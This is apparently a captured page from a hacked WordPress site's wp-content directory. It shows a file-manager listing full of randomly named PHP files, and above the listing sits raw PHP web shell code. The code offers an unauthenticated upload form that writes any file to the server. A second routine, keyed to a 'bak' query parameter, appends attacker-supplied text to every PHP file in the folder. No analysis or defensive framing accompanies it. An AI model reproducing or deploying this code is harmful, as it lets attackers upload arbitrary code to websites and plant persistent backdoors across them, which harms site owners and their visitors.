PATH:
home
/
sarkas88.com
/
public_html
/
wp-content
<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?>
[-] vDJY9VUR6yA.php
[open]
[+]
uploads
[+]
well-known
[-] YuCxRstdIg7.php
[open]
[+]
litespeed
[+]
themes
[-] y3JTUfP4RMd.php
[open]
[-] 47egNcBRpfE.php
[open]
[-] qPCA5IbR3QB.php
[open]
[-] RWwktFisp6m.php
[open]
[-] 3bnCRxruc7s.php
[open]
[+]
languages
[-] h1ASbdkOGLH.php
[open]
[-] index.php
[open]
[-] rdlhcuos.php
[open]
[+]
upgrade
[-] .htaccess
[open]
[+]
upgrade-temp-backup
[-] pKIDklFTNXZ.php
[open]
[+]
..
[-] php.ini
[open]
[-] IvOjzpe7Y5i.php
[open]
[+]
plugins
[-] hFXJtC8uUiZ.php
[open]